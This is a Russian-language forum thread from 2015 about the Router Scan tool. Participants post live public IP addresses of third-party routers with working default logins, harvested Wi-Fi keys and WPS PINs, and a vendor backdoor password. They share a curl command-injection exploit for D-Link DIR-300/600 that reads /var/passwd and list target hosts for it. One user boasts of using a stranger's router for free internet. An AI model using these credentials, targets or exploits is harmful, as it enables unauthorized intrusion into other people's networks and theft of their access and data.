Не могу понять, почему так мало Гудов в моем диапазоне? Сильно сомневаюсь, что юзеры меняли пароли по умолчанию...

Да и вообще, многие роутеры, которые видны в эфире, почему-то не видны при скане по http.

henri2002
14.09.2015, 09:47
Да и вообще, многие роутеры, которые видны в эфире, почему-то не видны при скане по http.



уже сотни раз обсуждалось, они закрыты с внешней стороны.

hellforce
14.09.2015, 16:48
binarymaster


Добавьте пожалуйста данные модели которые актуальные в Израиле

NETGEAR DGN2200v2BEZEQ

79.183.35.231 8080 31 Done Admin:Admin

79.183.35.138 8080 15 Done Admin:Admin

Hotbox Cable Modem

37.142.211.64 80

37.142.211.95 80

37.142.211.107 80

37.142.211.137 80

Данные для входа

admin:admin

вся информация находится в открытом доступе на вкладке:

http://IP/wlanBasicSecurity.asp

нужно только спарсить

СПАСИБО!!!!!

binarymaster
15.09.2015, 04:33
NETGEAR DGN2200v2BEZEQ



Бета версия их уже нормально обрабатывает.



Hotbox Cable Modem



В процессе добавления...

hellforce
15.09.2015, 22:43
Продолжу тему Израиля

вот еще несколько моделей

DLINK VDSL ROUTER D-Link 6740U v.H1

79.183.34.110 8080 31 Done support:support

DLINK VDSL ROUTER D-link DSL-6850U

79.183.34.164 80 31 Done support:support

Данные находятся в закладке : Advanced

Advanced Wireless -- Security Settings

binarymaster
16.09.2015, 04:30
Продолжу тему Израиля

вот еще несколько моделей

DLINK VDSL ROUTER D-Link 6740U v.H1

79.183.34.110 8080 31 Done support:support

DLINK VDSL ROUTER D-link DSL-6850U

79.183.34.164 80 31 Done support:support



Уже добавил, вы их через комментарии на сайте скидывали.

Upsurt
17.09.2015, 00:16
Wireless Access Point Gateway EnGenius

http://89.25.29.115:80 admin:admin






Нет подключения.



http://89.25.17.74:80 admin:admin Wireless Access Point Gateway EnGenius

binarymaster
17.09.2015, 02:23
http://89.25.17.74:80 admin:admin Wireless Access Point Gateway EnGenius



Снова оффлайн... может быть вы при следующей встрече с этим роутером запишите отладочную TCP сессию? Я бы попробовал найти аналогичные в Shodan.

Felis-Sapiens
17.09.2015, 13:20
D-Link DVA-G3672B (Firmware Version : RU_1.10)

http://support:[email protected]/

http://support:[email protected]/

Upsurt
17.09.2015, 19:10
@irLAN WR04 V1.00.18

http://89.25.118.51:8080/ admin:admin






ERR_CONNECTION_REFUSED



http://89.25.117.239:8080/

http://rghost.net/6dK7HvYDM

binarymaster
18.09.2015, 21:14
@irLAN WR04






http://89.25.117.239:8080/

http://rghost.net/6dK7HvYDM






D-Link DVA-G3672B (Firmware Version : RU_1.10)

http://support:[email protected]/

http://support:[email protected]/



Добавил.



Hotbox Cable Modem

37.142.211.64 80

37.142.211.95 80

37.142.211.107 80

37.142.211.137 80



Как оказалось, это ребрендированные Thomson, добавил.

Grizlik1981
19.09.2015, 06:26
А можно где-нибудь посмотреть полный список роутеров с которыми эта прога успешно справляется?

А так прога суперская!!! Я с её помощью уже больше месяца халявный инет использую Поднял на удаленном роутере VPN и теперь через него подключаюсь. Пока не спалили Респект автору!!!

Upsurt
19.09.2015, 10:21
SBN WR11N R2

http://178.239.234.2:8080 admin:admin

http://rghost.net/7PMyGzqHX

http://178.239.232.254:8080 admin:admin

binarymaster
19.09.2015, 17:05
SBN WR11N R2

http://178.239.234.2:8080 admin:admin

http://rghost.net/7PMyGzqHX

http://178.239.232.254:8080 admin:admin



Start Bit SBN-W11N-R2 оказался ребрендированным Upvel BN, добавил.

binarymaster
19.09.2015, 17:12
А можно где-нибудь посмотреть полный список роутеров с которыми эта прога успешно справляется?



Ай-яй-яй... программой пользуемся, а мануал читаем невнимательно...



Если можно, объясните чайнику, как это сделать.



Легко:

1. Ищем в данной теме, в каких роутерах упомянута функция VPN (PPTP/L2TP/OpenVPN) сервера

2. Используем гугл: %RouterName% поднять VPN сервер

Upsurt
19.09.2015, 18:41
AirLive WL-1500R

http://178.239.230.6:8080/ airlive:airlive

binarymaster
19.09.2015, 20:14
AirLive WL-1500R

http://178.239.230.6:8080/ airlive:airlive



Добавил.

imguestmsc
19.09.2015, 20:53
Здравствуйте, а можно добавить функцию, парсер PPPOE соединение (логин и пароль) ?

binarymaster
19.09.2015, 21:02
Здравствуйте, а можно добавить функцию, парсер PPPOE соединение (логин и пароль) ?



Нельзя.

http://s7.hostingkartinok.com/uploads/thumbs/2015/09/122530c1f4155ce8c14526e2aa6a7a66.png

imguestmsc
19.09.2015, 21:09
Нельзя.

http://s7.hostingkartinok.com/uploads/thumbs/2015/09/122530c1f4155ce8c14526e2aa6a7a66.png


Спасибо за оперативный ответ.

Spark
19.09.2015, 22:54
EchoLife HG850a

http://5.140.183.249

telecomadmin:admintelecom

binarymaster
20.09.2015, 00:29
EchoLife HG850a

http://5.140.183.249

telecomadmin:admintelecom



root:admin тоже подходит, добавил.

http://s7.hostingkartinok.com/uploads/thumbs/2015/09/788850e4aa0bd9c28c0d794ef497de05.png

И ещё, судя по данным, у него есть беспроводной брат-близнец. Сможете его найти?

amod-cccp
20.09.2015, 03:31
Может и звучит некрасиво, но какой пароль от архива с программой? http://stascorp.com/load/1-1-0-56

zimmer
20.09.2015, 03:38
Может и звучит некрасиво, но какой пароль от архива с программой? http://stascorp.com/load/1-1-0-56



ниже ссылки на скачивание висит табличка с паролем... (на англ.яз.) желто-черная

Kolhozan
20.09.2015, 04:25
Может и звучит некрасиво, но какой пароль от архива с программой? http://stascorp.com/load/1-1-0-56



http://s7.hostingkartinok.com/uploads/images/2015/09/b917f89a0356a31744930bdfa6b3c5c8.jpg

CRACK211
20.09.2015, 10:13
Добавил.



Не поделитесь новой бетта версией?)))

Payer
20.09.2015, 10:39
Сейчас сотнями стали появляться QBR-1040W

http://www.qtech.ru/catalog/wifirouters/352/info.htm

Определяются программой как "Realtek Wireless Router"

Но внутри хитрая структура, он вроде как и доступен снаружи, но браузер не может нормально отобразить страницу.

Чухается, перезагружается и пароль два раза спрашивает.

Отправил личкой адреса, может получится его добавить.

amod-cccp
20.09.2015, 12:17
ниже ссылки на скачивание висит табличка с паролем... (на англ.яз.) желто-черная



Спасибо отозвавшимся!

binarymaster
20.09.2015, 13:51
Не поделитесь новой бетта версией?)))



Бета версий пока нет, скоро релиз.



Сейчас сотнями стали появляться QBR-1040W

http://www.qtech.ru/catalog/wifirouters/352/info.htm

Определяются программой как "Realtek Wireless Router"

Но внутри хитрая структура, он вроде как и доступен снаружи, но браузер не может нормально отобразить страницу.

Чухается, перезагружается и пароль два раза спрашивает.

Отправил личкой адреса, может получится его добавить.



Как ни странно, практически все IP-адреса у меня отпарсились корректно и без глюков.

Upsurt
20.09.2015, 14:18
eCos Embedded Web Server (TOTOLINK) Model No.N100RE

http://89.25.27.120:80 admin:mordor

binarymaster
20.09.2015, 14:39
eCos Embedded Web Server (TOTOLINK) Model No.N100RE

http://89.25.27.120:80 admin:mordor



Не отвечает.

Upsurt
20.09.2015, 14:58
eCos Embedded Web Server (TOTOLINK) Model No.N100RE

http://89.25.27.120:80 admin:mordor






Не отвечает.



открыв веб-браузер, а затем не отвечают

TOX1C
20.09.2015, 16:32
11o.159.143.246 8o8o

admin:

DIR-615 с непонятной прошивкой

парсится кое-как на 443 порту

Upsurt
20.09.2015, 17:47
Снова оффлайн... может быть вы при следующей встрече с этим роутером запишите отладочную TCP сессию? Я бы попробовал найти аналогичные в Shodan.



Wireless Access Point Gateway EnGenius

http://89.25.114.179/home.asp admin:admin

http://rghost.net/66Sc9j2rJ

XAMRAS
20.09.2015, 21:14
http://188.113.39.228:8080 78 Done admin:admin MI-MINI

binarymaster
20.09.2015, 21:37
eCos Embedded Web Server (TOTOLINK) Model No.N100RE



Добавил. Их оказалось много в Shodan:

https://www.shodan.io/search?query=country:BG+title:TOTOLINK+eCos+Embedd ed+Web+Server

Felis-Sapiens
20.09.2015, 21:57
Бета версия по-прежнему плохо парсит MikroTik (напр., 80.245.124.99). Какие-то трудности? Будет ли в релизе?

imguestmsc
20.09.2015, 22:22
Netis Wireless Router RTK V2.1.1

http://195.211.181.14/

user:user

http://rghost.ru/69pGK5RjQ

binarymaster
20.09.2015, 22:35
11o.159.143.246 8o8o

admin:<empty>

DIR-615 с непонятной прошивкой

парсится кое-как на 443 порту



Какой-то особый, с multi-ssid, впервые такой вижу.

D-Link DIR-615, hardware: rev B1G, firmware: 7.19

Он позаимствовал сервер Mathopd от DIR-300 вместе с его уязвимостями Добавил.



Wireless Access Point Gateway EnGenius

http://89.25.114.179/home.asp admin:admin

http://rghost.net/66Sc9j2rJ



Это Realtek, добавил.



Netis Wireless Router RTK V2.1.1

http://195.211.181.14/

user:user

http://rghost.ru/69pGK5RjQ



Добавил.

Обнаружил забавный факт - там ещё есть две учётки:

guest:guest - админская, как ни странно

guest:842Dairocon - бекдор

Upsurt
21.09.2015, 11:12
BUFFALO: DD-WRT, model: WHR-HP-G300N

http://109.199.230.83:8080/ admin:samsung

http://rghost.net/6FynnwyyM , http://rghost.net/64JRLRCBn

BUFFALO: DD-WRT, model: WZR-HP-G300NH

http://93.183.151.143:8080/ admin:admin

http://rghost.net/62Bt7N6pk

binarymaster
21.09.2015, 17:22
http://188.113.39.228:8080 78 Done admin:admin MI-MINI



Уже оффлайн.



Бета версия по-прежнему плохо парсит MikroTik (напр., 80.245.124.99). Какие-то трудности? Будет ли в релизе?



Да, будет, я в нём разобрался. Добавил.

Хочу предупредить тех, кто скидывает новые роутеры, на буднях у меня практически нет времени на разработку, пилю в основном на выходных.



удачные результаты программа больше не сохраняла



Посмотрите в настройках, генерация гудов могла отключиться.

Slavovic
21.09.2015, 21:10
Здравствуйте, вчера пользовался программой, была выбрана вкладка Good Results, появилась ошибка со значением 1469( к сожалению случайно закрыл не сделал скрин), удачные результаты программа больше не сохраняла, в таблице(в которую все сохранил) и в самой программе их было ровно 1469. У меня одного такая проблема?

Slavovic
22.09.2015, 00:31
Да, будет, я в нём разобрался.

Хочу предупредить тех, кто скидывает новые роутеры, на буднях у меня практически нет времени на разработку, пилю в основном на выходных.

Посмотрите в настройках, генерация гудов могла отключиться.



спасибо

kolbak
22.09.2015, 15:29
Я был бы очень рад, если кто-нибудь написал бы её, подкрепив скриншотами, и чтобы всё это засунуть в HTMLник с документацией, прилагаемой к программе.



Нашел желающих?

Могу предложить помощь.

- скриншоты делать умею

- Документации с скриншотами в ворде приходилось делать вот пример http://s015.radikal.ru/i333/1509/34/6f2ea0369342t.jpg

- знаю в среднем качестве HTML, CSS

- могу снять обучающее видео

binarymaster
22.09.2015, 15:58
Нашел желающих?

Могу предложить помощь.



Вы первый, кто предложил.

Требования самые минимальные - текстовое описание функций + скриншоты к ним. В HTML я уже сам всё оформлю, и допишу в нужных местах, где есть "подводные камни".

Надеюсь на вашу безвозмездную помощь! Результаты можно скидывать на файлообменник, и прямо сюда в тему. Было бы здорово, если каждый добавил что-то от себя, дополнив документацию, поскольку в этой теме давались ответы на многие вопросы. И я уверен, что многие участники темы уже достаточно компетентны в этом.

P.S. в документации упомяну никнеймы тех, кто помогал (по желанию конечно)

XAMRAS
23.09.2015, 00:26
Нет данных по данному роутеру:

195.49.185.19:80 admin:admin TP-LINK WindRiver Router

binarymaster
23.09.2015, 02:05
Нет данных по данному роутеру:

195.49.185.19:80 admin:admin TP-LINK WindRiver Router



Уже добавил.


Address: http://195.49.185.19/
Time: 94 ms
Authorization: admin:admin
Device: TP-LINK TL-ER6120
BSSID:
LAN IP: 10.49.1.11
LAN Subnet Mask: 255.255.255.0
WAN IP: 195.49.185.19
WAN Subnet Mask: 255.255.255.248
WAN Gateway: 195.49.185.17
Domain Name Servers: 77.243.0.12 77.243.0.27
Поскольку беспроводные с такой прошивкой мне ещё не встречались, оставил в BSSID.

binarymaster
23.09.2015, 17:05
Как сюда прикреплять файлы, без обменника ?



В каких-то темах я видел возможность прикрепления, но тут вроде её нет.

zimmer
24.09.2015, 12:32
binarymaster, вопрос по поводу вебкамер (ipкамер,видеорегистраторов и прочего) при скане часто попадаются они, но практически не детектируются...

в чем вопрос то (даже пожелание): есть ли в планах сделать поддержку камер (по сути она и так есть, но более побольше внимания им уделить), правда там есть свои нюансы: для просмотра в браузере большинство заточено под IE, каждый вендор имеет свой плагин, но для успешной авторизации плагин не нужен..

P.S.: перечитал - сам не понял что написал (немного пьян), но фак остаётся фактом, поддержка камер значительно бы увеличила привлекательность вашей программы... так же готов предоставить посильную помощ если возникнут какие трудности в реализации....

Felis-Sapiens
24.09.2015, 13:52
Уязвимость в старых прошивках DIR-300 (2.12, 2.13) и DIR-600 (2.12-2.14):

http://www.s3cur1ty.de/m1adv2013-003

tl;dr

Получение пароля:


curl --data "cmd=cat /var/passwd" http://ip/command.php


http://79.l65.122.75/

http://89.96.28.143:808O/

http://82.176.188.42:808O/

binarymaster
24.09.2015, 20:11
Вопрос ко всем.

Нужна ли подобная инструкция ?



Пишите, пригодится.



есть ли в планах сделать поддержку камер



Если какие-либо камеры содержат настройки беспроводной сети - присылайте их IP адреса для изучения и добавления в поддержку. Я никогда не планирую добавление моделей, я добавляю в поддержку то, что мне присылают, либо что нахожу сам.



Уязвимость в старых прошивках DIR-300 (2.12, 2.13) и DIR-600 (2.12-2.14):

http://www.s3cur1ty.de/m1adv2013-003



Благодарю! Исследую...

binarymaster
24.09.2015, 20:26
http://79.l65.122.75/

http://89.96.28.143:808O/

http://82.176.188.42:808O/



Уязвимость присутствует, но файл /var/passwd на всех устройствах пуст. Есть идеи?

UPD:

/var/etc/httpasswd тоже.

UPD 2:

Разобрался, добавил эксплойт в Router Scan.

kolbak
25.09.2015, 00:11
Обнаружил проблему в работе с *.csv в версии 2.52

Открываю екселем - добавляю коментарий или редактирую таблицу, сохраняю.

RS отказывается брать данные. При сравнении файлов по содержимому видно что ексель убирает "" между ;

Будет ли исправлен стиль формирования *.csv или посоветуй программу в которой можно объединять свои *.csv и удалять лишние строки.

Добавил бы в RS работу с таблицами:

- добавление ранее сохранных таблиц в открытую, а не заменять (для объединения)

- работу с строками (Shift+↑ - выделить, Del - удалить отмеченное или выбранную строчку)

binarymaster
25.09.2015, 04:12
это только DIR-300 и DIR-600 или эксплоит будет это пробовать на других роутерах?



Только на этих прошивках этой версии.



- добавление ранее сохранных таблиц в открытую, а не заменять (для объединения)

- работу с строками (Shift+↑ - выделить, Del - удалить отмеченное или выбранную строчку)



Попробую сделать.



вбил пару ради прикола, а тут


Похоже на баг... он пытается авторизоваться не на той странице, получает код 200 OK...

UPD: исправил баг.

>Интересный PIN

Так сработал один из сплойтов, видимо структура данных отличается, поэтому крякозябры.

>Thomson STB2.01.72

STB2.01.72 добавил.

>Не отдался (((

Он при попытке авторизации отдаёт код 404 (не найдено), хотя должен 401. Видимо какая-то хитрость...

UPD: обошёл её кодом (Code div 100 <> 4) и получил доступ.


Address: http://83.221.168.157/
Time: 110 ms
Authorization: support:support
Device: Micro DSL (DSL-2750U 963281TAVNG | B038 K8B 0K ME3G-00-test-3388.V03)
BSSID: AC:F1:DF:F1:47:DD
ESSID: DLink
Security type: WPA/WPA2
Key: 3279808zz
WPS Pin: 31957199
LAN IP: 192.168.1.1
LAN Subnet Mask: 255.255.255.0
WAN IP: 83.221.168.157
Domain Name Servers: 217.29.116.2 8.8.8.8

Felis-Sapiens
25.09.2015, 15:04
Ericsson GPON SBM4F00ARA - не парсит данные wifi

http://admin:[email protected]/

sha9
25.09.2015, 15:48
доброго времени суток.давно с вами, но не регался.специально зарегистрировался чтобы - во-первых высказать свое восхищение сканом, самой идеей и естественно- реализацией. во-вторых заметить, что TL-WR-740N парсит только дефолтовые пароли, эксплойты не работают ( у меня во всяком случае). а если парсит дефолтовый пароль не вытаскивает вайфай. есть тоже проблема с DIR-640 NRU - тащит мак, но дальше не хочет. с микротиком вообще не дружит.только дефолты, а это редкость. ну это понятно. если будет такая возможность нельзя ли учесть это в новых сборках РС?

binarymaster
25.09.2015, 17:52
думаю надо добавить для камер как проверка по умолчанию



>Hikvision IP Camera

Добавил в поддержку, за исключением получения инфы о точке доступа (данная камера - проводная).



Интересный роутер



>OpenWrt Eltex RG-1404GF-W

Там недостаточно прав пользователя, чтобы получить данные точки доступа.

Получение IP поправил.

>NETGEAR WNR612v3

Похоже, глюки прошивки. Даёт положительный ответ на неверный логин/пароль через какое-то кол-во попыток.



Ericsson GPON SBM4F00ARA - не парсит данные wifi

http://admin:[email protected]/



О! Давно хотел добить эту модель... только она не попадалась мне во внешней сети. Доработал.



TL-WR-740N парсит только дефолтовые пароли



А для них нет эксплойтов по нахождению пароля админа.



эксплойты не работают ( у меня во всяком случае)



Не везёт. В некоторых случаях может получить имя/защиту/пароль точки доступа.



а если парсит дефолтовый пароль не вытаскивает вайфай



А вот на этом месте поподробнее, реквестирую образцы.



есть тоже проблема с DIR-640 NRU - тащит мак, но дальше не хочет



Тоже нужны образцы.



с микротиком вообще не дружит.только дефолты, а это редкость



Эксплойтов то нет. Если дефолты подбирает - значит дружит!



если будет такая возможность нельзя ли учесть это в новых сборках РС?



Учесть-то можно... но процитирую своё сообщение выше:



Я никогда не планирую добавление моделей, я добавляю в поддержку то, что мне присылают, либо что нахожу сам.

Felis-Sapiens
25.09.2015, 19:55
О! Давно хотел добить эту модель... только она не попадалась мне во внешней сети. Доработал.



А для аналогичного KDU137840/3 (http://46.162.2O4.111/) будет работать? И не знаете случаем, как конфигурационный файл ont_config.dat расшифровать?

Ericsson T083G:

http://46.162.2O7.7/ - admin:password

http://46.162.217.l64/

http://141.136.64.5O/

ZTE ZXV10 W300 - не опознался

http://46.162.2O8.119

http://141.136.8l.35

И вот ещё камера ESee:

http://46.162.194.7O/ - admin:

http://46.162.l93.23/

Felis-Sapiens
25.09.2015, 20:28
Четко видно что алгоритм KEY зависит от МАС



Видно, что последние два октета MAC-адреса входят в ESSID. Алгоритм KEY(MAC) может конечно и есть, но не такой, чтобы была видна зависимость. Два последних - точно разные роутеры? Почему у них тогда MAC'и одинаковые? Чем они отличаются? Может просто ip сменился.



так, вроде бы есть словарь на этого провайдера.



Если я не ошибаюсь, этот словарь - все 8-символьные комбинации 3467ACDEFGHJKMNPQRTUXY. Есть ещё правда некоторые роутеры, где символы 2345679ACDEF.

Felis-Sapiens
25.09.2015, 21:12
109.165.19.58 34:8A:AE:56:78:AC ROSTELECOM_78AB WPA/WPA2 66A7YPDH 45607318

188.114.15.124 34:8A:AE:56:78:AC ROSTELECOM_78AB WPA/WPA2 66A7YPDH 45607318

31.23.162.91 34:8A:AE:56:78:AC ROSTELECOM_78AB WPA/WPA2 66A7YPDH 94822229



Все три из Ростова-на-Дону, OJSC Rostelecom Macroregional Branch South - подозрительно. Но всё равно скинь в личку свою таблицу.

binarymaster
25.09.2015, 22:35
А для аналогичного KDU137840/3 (http://46.162.2O4.111/) будет работать? И не знаете случаем, как конфигурационный файл ont_config.dat расшифровать?



Не подобрался пароль.

Файл ont_config.dat может быть либо не зашифрован, либо заXORен байтами 0xAA.

binarymaster
25.09.2015, 22:48
Алгоритм 100% есть



Ну... при такой большой уверенности можно создать вероятностную нейронную сеть, которая принимала бы на вход параметры из известной выборки, и предполагала бы символы пароля для нового введённого MAC-адреса...

Felis-Sapiens
25.09.2015, 23:03
Файл ont_config.dat может быть либо не зашифрован, либо заXORен байтами 0xAA



Да, был заXORен, спасибо.

Ericsson KDU137840/3 admin:admin

http://141.136.79.l76/

JCG JHR-N916R admin:admin

http://141.136.80.2O1

Motorola VT2542 router:router

http://141.136.8l.89/

http://141.136.94.5O/

Upsurt
26.09.2015, 21:37
CANYON(CNP-WF514)

http://84.22.4.47:8080/ guest:guest

не парсит данные wifi

binarymaster
27.09.2015, 00:22
Ericsson T083G:

http://46.162.2O7.7/ - adminassword

http://46.162.217.l64/

http://141.136.64.5O/



Добавил.



Ericsson KDU137840/3 admin:admin

http://141.136.79.l76/



Обрабатывает стабильно.



ZTE ZXV10 W300 - не опознался

http://46.162.2O8.119

http://141.136.8l.35

И вот ещё камера ESee:

http://46.162.194.7O/ - admin:&lt;empty&gt;

http://46.162.l93.23/






JCG JHR-N916R admin:admin

http://141.136.80.2O1

Motorola VT2542 router:router

http://141.136.8l.89/

http://141.136.94.5O/






CANYON(CNP-WF514)

http://84.22.4.47:8080/ guest:guest

не парсит данные wifi



Эти пока не добавлял, но запомнил на будущее.

Сейчас готовлю релиз, осталось немного. Новые устройства пока не принимаю.

Felis-Sapiens
27.09.2015, 10:34
могу помочь с прошивкой, если нужна.



Скинь в личку

Upsurt
27.09.2015, 18:12
Мы с нетерпением ждем новых релиз

gentux
28.09.2015, 14:48
Сделай контроль соединения !!!



Разве не оно?

http://rghost.ru/8Qb85RJM6/image.png

kolbak
28.09.2015, 16:02
Разве не оно?



оно, но не хватает логирования, чтобы не пропустить момент.

Ступил ведь google.com можно записать как 64.233.186.138, а порт какой писать?

За что отвечают параметры:

Frequency - ?

Timeout - это через сколько производить пинг?

zimmer
28.09.2015, 16:53
оно, но не хватает логирования, чтобы не пропустить момент.

Ступил ведь google.com можно записать как 64.233.186.138, а порт какой писать?

За что отвечают параметры:

Frequency - ?

Timeout - это через сколько производить пинг?



Frequency - как часто проверять, ну а таймаут - он и есть таймаут, т.е. сколько будет ждать ответа....

порт 80 писать... но думаю если не указать порт - то он будет по дефолту стучаться на 80-й порт!!!

binarymaster
28.09.2015, 17:15
Ступил ведь google.com можно записать как 64.233.186.138, а порт какой писать?



Если используется режим ICMP (Ping), то порт можно любой прописать. Он используется только в режиме проверки TCP Connect.

Я обычно использую второй режим, вместе с адресом 8.23.224.120:80 (хост dynupdate.no-ip.com).



За что отвечают параметры:

Frequency - ?



Частота проверки, каждые X секунд выполняет проверку.



Timeout - это через сколько производить пинг?



Это есть время, отведённое на проверку. Если в течение X миллисекунд пинг не ответит, или соединение не установится, то проверка считается проваленной. После трёх неудачных проверок сканирование ставится на паузу. После первой же удачной проверки сканирование возобновляется.



оно, но не хватает логирования, чтобы не пропустить момент.



Что-нибудь придумаю...

Shimura
28.09.2015, 17:35
После первой же удачной проверки сканирование возобновляется.



а пропущенные айпи между последней удачной проверкой и паузой ресканятся? или так и остаются пропущенными?

binarymaster
28.09.2015, 17:40
а пропущенные айпи между последней удачной проверкой и паузой ресканятся? или так и остаются пропущенными?



Цепь выдачи IP адресов откатить невозможно. Можно только вручную перепроверить.

didoff
29.09.2015, 11:34
Очень много вот таких видит но не вытаскивает данные. Tp-link tl-wr841n и nd http://78.29.8.116.8080/

Собственно сама его прошивка.

http://rghost.ru/8DMHTNspX

binarymaster
29.09.2015, 14:39
Строка User-Agent:

Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1

Это 3 разных (Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1) ?



Не, это одна полная строка.



НО вдруг ты реализовал рендромную-смену так сказать недокументированная фича программы


Можно было перехватить чем-нибудь запросы, да посмотреть... я бы так и сделал



Очень много вот таких видит но не вытаскивает данные. Tp-link tl-wr841n и nd http://78.29.8.116.8080/



Нет данных для входа в роутер.

TOX1C
29.09.2015, 14:41
Нет данных для входа в роутер.



62.221.42.163 80 78 Done admin:admin DSL-N10E

не парсится бета версией

sha9
29.09.2015, 15:22
кстати, интересный момент - TP-LINK TL-WR740N в одних случаях отдает только мак и ессид, а в других случаях пароль на вайфай. но паролей на сам роутер не выдает. с чем это может быть связано? прошивки разные?

zimmer
29.09.2015, 19:09
кстати, интересный момент - TP-LINK TL-WR740N в одних случаях отдает только мак и ессид, а в других случаях пароль на вайфай. но паролей на сам роутер не выдает. с чем это может быть связано? прошивки разные?



у меня бета вообще на них не реагаирут, статус Router Webserver (Login Incorrect), пароль админ и логин админ (в пасс листах точно есть) и при скане (не помню уже диапозон, но все штук 20-ть их вообще не отпарсил...),

binarymaster, глянь пожалуйста данную модель, мож че поломалось в бетке с этим роутером, если надо айпишник их, то завтра на работе найду их и кину...

zimmer
29.09.2015, 19:14
у меня на работе эта модель роутера оказывается, щас провер, логин и пароль не подбирает (в пасслистах он есть) gis.sytes.net -это дин днс его, порт 8885, логин и пароль в личку отправлю

Felis-Sapiens
29.09.2015, 22:13
EDIMAX BR6428GN - ошибка в кодировке ESSID

http://admin:[email protected]/

binarymaster
30.09.2015, 02:47
у меня на работе эта модель роутера оказывается, щас провер, логин и пароль не подбирает (в пасслистах он есть) gis.sytes.net -это дин днс его, порт 8885, логин и пароль в личку отправлю



Проверил, всё отпарсило сразу (правда использовал функцию Use credentials).



у меня бета вообще на них не реагаирут, статус Router Webserver (Login Incorrect)



У вас модуль "Router Scan (main)" случаем не выключен?

zimmer
30.09.2015, 04:19
Проверил, всё отпарсило сразу (правда использовал функцию Use credentials).

У вас модуль "Router Scan (main)" случаем не выключен?



Use credentials тоже включена, модули все включены...

но, если парсится в текущей бете (на данный момент, а не которая выложена была ранее) - то думаю что норм все)))))

Felis-Sapiens
30.09.2015, 13:33
D-Link DIR-330 Firmware Version: 1.23 (возможно и другие версии/модели)

Information disclosure: файлы version.txt, chklst.txt, wl.txt доступны без авторизации ==> можно узнать BSSID, SSID

http://8O.79.241.14/version.txt

D-Link DIR-628 Hardware Version: A2 Firmware Version: 1.24RU

http://91.19O.85.162:8080/chklst.txt

Guron_18
01.10.2015, 02:39
More than 60 undisclosed vulnerabilities affect 22 SOHO routers

http://seclists.org/fulldisclosure/2015/May/129

1234IsDanger
03.10.2015, 12:00
Отличная прога, правда столкнулся с 1ой проблемой которую пока не решил, попытался найти диапазон IP роутеров ростелекома фирмы Sagemcom по Смоленской обл., и не удалось проверил и через ipgeobase и через пару сайтов, результат нулевой. Может кто подскажет какой либо еще способ определить ip близлежащих роутеров о которых мне известны только essid, bssid, и координаты некоторых из них в гугл.

Slavovic
04.10.2015, 11:29
Отличная прога, правда столкнулся с 1ой проблемой которую пока не решил, попытался найти диапазон IP роутеров ростелекома фирмы Sagemcom по Смоленской обл., и не удалось проверил и через ipgeobase и через пару сайтов, результат нулевой. Может кто подскажет какой либо еще способ определить ip близлежащих роутеров о которых мне известны только essid, bssid, и координаты некоторых из них в гугл.



У меня такая же проблема с Ростелекомом, по Ростовской области, уже множество адресов прогнал, а в своём городке только три нашёл...

zimmer
04.10.2015, 14:51
береш свой айпишник, узнаеш диапозон и сканиш!!! если не находит прога ничего - то скорее всего роутеры провайдер настраивает так, что нет доступа из вне!!!

Ossen
04.10.2015, 15:36
У меня такая же проблема с Ростелекомом, по Ростовской области, уже множество адресов прогнал, а в своём городке только три нашёл...



Вот для таких случаев и создана (3WiFi: Свободная база точек доступа) то что не насканилось у вас вполне могло насканится у других. поэтому делитесь результатами сканирования.

binarymaster
04.10.2015, 15:59
попытался найти диапазон IP роутеров






и не удалось



В базе 3WiFi теперь есть поиск диапазонов.

Slavovic
04.10.2015, 23:28
береш свой айпишник, узнаеш диапозон и сканиш!!! если не находит прога ничего - то скорее всего роутеры провайдер настраивает так, что нет доступа из вне!!!



пробовал и так..

zimmer
05.10.2015, 06:11
пробовал и так..



ну вот значит и ответ на твою проблему... нет доступа из внешки к роутерам... ну только если не добавлен у тебя порт 8080 - то попробуй его добавить, во многих роутерах это порт для доступа из внешки...

zimmer
05.10.2015, 13:37
Дело в том что офф диапазон только для статических IP. А кто покупает статистический IP тот точно знает что пароли на роутер надо менять.

Я свой динамический IP пару раз прогнал и кто то новый да появляется.[/SPOILER]



ты наркоман чтоле?

1. что для тебя офф диапозон?

2. только для статических айпишников? - динамические откуда он берет по твоему?

3. твоя мысль отчасти верна (если я правильно понял что ты имееш ввиду своим бредом) в том случае если мелкий провайдер и во внешку у него смотрит один айпишник на несколько клиентов (таких щас очень редко встретиш), и в том случае сканить лучше всего локальные айпишники (хотя локальную сеть и так лучше сканировать)..

binarymaster
05.10.2015, 17:26
В Ростовской области свои "ho4uku6at"(сменены пароли), скоро автору скину чтоб добавил, ибо половина asus и tp-link



Насчёт этого в курсе, в релизе в словарях уже добавлен.

kolbak
05.10.2015, 17:35
ты наркоман чтоле?

(если я правильно понял что ты имееш ввиду своим бредом)



Приму это в знак вашей необразованности и невежества

1. Наверно вы не вкурсе но у провайдеров есть такое понятие как - белый,серый,внутренний IP (погугли и найди отличия)

2. есть перечень офф так вот мой динамически не попадает в них, а попадают туда только те у кого проплачена услуга белого IP - надеюсь понятно объяснил

3. пример Spark у целого квартала 1 внешний IP зато у всех разные 10.х.х.х. (Другими словами - хочешь хостить доту или варик покупай белый IP)

4. если ничего не поняли - то сканируйте по маске /8

zimmer
05.10.2015, 20:34
2. есть перечень офф так вот мой динамически не попадает в них, а попадают туда только те у кого проплачена услуга белого IP - надеюсь понятно объяснил



нет не понятно, выложи пожалуйста свой айпишник в виде 11.11.*.* - вразуми необразованно!!!! и кто сказал что на сервисе тобой приведенном точные данные? логичнее данные по айпишникам искать на сайте регистратора...

разница в динамическом и статическом айпишнеке ровно в том, что статика постоянна, а динамический меняется с каждой сессией!!!

белые и серые айпишники = локальные и внешние!!

1234IsDanger
05.10.2015, 23:17
В базе 3WiFi теперь есть поиск диапазонов.



Найс.Воспользовался,+ добавил что нашел.

binarymaster
06.10.2015, 00:51
так вот мой динамически не попадает в них, а попадают туда только те у кого проплачена услуга белого IP






белые и серые айпишники = локальные и внешние!!



Товарищи, вы же не IP адреса в локальной сети, чтобы конфликтовать...

Попробую всё разъяснить:

1. IP адрес - глобальный/локальный

- Интерфейс с глобальным IP адресом выходит в интернет напрямую без посредников, и к нему имеют возможность подключаться все, у кого есть интернет.

- Остальные IP адреса - локальные.

2. IP адрес - белый/серый

- Это синонимы 1 пункта, определяются по возможности подключения извне.

- Белый IP адрес - это всегда глобальный адрес, серый - всегда локальный.

- Если доступа к интернету нет, то адрес нельзя классифицировать белым или серым.

3. IP адрес - статический/динамический

